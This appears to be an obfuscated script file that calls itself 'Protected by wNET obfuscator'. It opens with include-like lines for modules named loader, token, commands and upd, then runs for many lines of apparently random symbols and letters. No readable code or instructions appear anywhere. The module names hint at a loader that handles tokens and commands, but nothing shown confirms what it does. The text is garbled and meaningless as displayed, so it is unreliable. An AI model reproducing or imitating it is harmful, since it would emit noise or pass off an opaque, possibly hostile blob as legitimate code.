-- Protected by wNET obfuscator [PRIVATE]

inc ; 4all
inc ; loader
inc ; local
inc ; token
inc ; commands
inc ; tt
inc ; upd

$<>F_POL: #>$F_P{L::#> "!@>?DS CA< @!&~#R_LP$+{[_S%@]#X<>R_<:L M@K$F+_ROFL$<@+%#DJA
F@#$_+{:@> :#{"LED AOL#_< A#<<M $O)P:{ +_K!@#_F$(+D%#AFPLS<O@!~ JDF$+_PM@#L_>A%KF@S

$R+F$)_PL_<>$F>@RO<M::P&%^A#MR_PAF<$[J%K]DF_$L_&OP#A@$#<>FL$#_R+P@F<%_DM!@_SLKF@<A
$#R_FPC _:W> A<<#M_A GJMV) $#(A OL#> #@!?+_@S%_P{<!P$A#_%+W$!~ JMKF_!<$$RO_FLP@A#_
A$#R_PA+F{ P$+_:$A#K$E P_ADJM#MRK IF_ASO$\ R@#K$PMF<S#$&A<>_P JMLF_@!$#R_+P@FLA$%O
#$R_OF_L@ @#<$R JMA_F NR_A#$R AP_$FA$::> A#ROLF_AO L3$$$F(_@#D @PLF#<$M+_RO_@!$JD%
@_+$#R_P@FLM<: W>@S#_+L%<$K_AFDMOP&_@$$F_O#L!#GJM+_>$A#MRL@P_! KRO_@F#M$+P~%_A@FL

$R_FLP$+W@_#%R$JMKF!~( A$RFM#P_$(JD!~~!+_%L_OFP~&$#A_>JROF<: P@F_+$RM~L#K@_S#<>OA
PLS_@#$L#<$@#F$JMLROF_P_$!&(KA_P_$_D!~%JF_A#ROFL_OP$$A#FM++@$_@F+P#L_$AM<%@S_@DJA
RF$+)_O#$F)M# O#DFM@#O FIS #$MMMM# JJ_<#F$LM~P@)!$$KF@#_$A%R_P: $FPL_#R@J_+MA$LFOP
P_A+W{_@$F#<%JKRO_<D!!%F#OP_R~FL$$#_MA+F@##!+_R%@$P$O~!$_A#F PFLM@#_+K<@S!~_D#JRO

R_PLM$+_@#ROFL_@$[<P~%JMK#D$!_F#~AOPM<<$$R_LFOP_$#A%!R_M+$$#J $F_OPA@L#<D_M!@_KFSP
JDFPL_+!@#$_R@M$FLP~%K_@#J$D%LFM_#A~!+P_R!OA<$#MPL_!K@F$_$J@R @PMFL$_#DJO!~_+@PFA
#$RP_LMF@+<$R_!~D@!_OP%$$FROLA#_+J#D!$M_PL@FKS_@$+~JRO#MFPL_@ $F_O+~RMLF#$_@K<DJ#P
@_FLM+PA@_S<$J_RMDF!~#@L+P_#S$OA@~%FRO~$K!_PMLF@#D$+_R~P<OA~%K FJ#_$PLO_+S#R@MFL@P
R_PML_+@$F#<$JM~D@_!P#ROFL~$+S@K!~#_O@PLJMF$_$R+P_AKF$+@~D#$O FJ#_+PAM_LF#@$<RO_~D
FML_P$O+R_A#<P_@JF$M~PL!R_D#OA@_~$FJ+RO#L_$+APM_<@D!#FRO#P_$L @$RO_+PA$FM#J<L~P_D#

FMLP_$+R@O#J$+FMPL@~#D@_R~OJ#PF_A+~$L_M#$@F_+PJRLO_!~D@$K#FP_ R$P@+FL_#A@M~D_P~OK$
@F_PLM$R+@#<D~F_OPA#K!+~S@JRL_#$P~FM$_D#@O_PLA#J+P_~RMFL@#S%_ F#O_R+PLMF@~$J<@DOKP

$RMF_@+PLA#K<$D_~R#OFPLM_#@$+KDJ_P#@LF_RMOA~$<F#P@_~JRO$A#L!P KFP#_$RO@M+P_A~LF_DJ
@P+FL#RMF_$~PAO_#JL_D#@P~OFL_$K+R_A~@L#FM~DJO$_P+R_MPLF$A#K<@ $FM_+@PL#DOK<RP!_#J$

OFL_P@~R$M#A+D$_~PK_@FLMR~$#J<PA#OK_DF+_PL#RM_AO~@L$#F_P~#J!< F@~PL#RM_$+AOK_#D~J$
@_+)prf@l#$rk<@m #rjok@ ir@)_(olr@# r@<fprkgevi!)_#eoqw_p:d{a:f@k#l<p{rk_#ro_@#d(F
_)o@$rfl@ f<:e<?r> @"e:rRF@#wrlp23la#{p:rw{ ap:#e+r"#?$e ?wa>f">ed as}|a}ra|#$|++b

A#_PR{DAEL: #L>?A>PG)O$#EOLP$L#OL {}PA{}{}{A :#":L :F >DS><$> <SG{:LV{PX}R{}{#_{$r
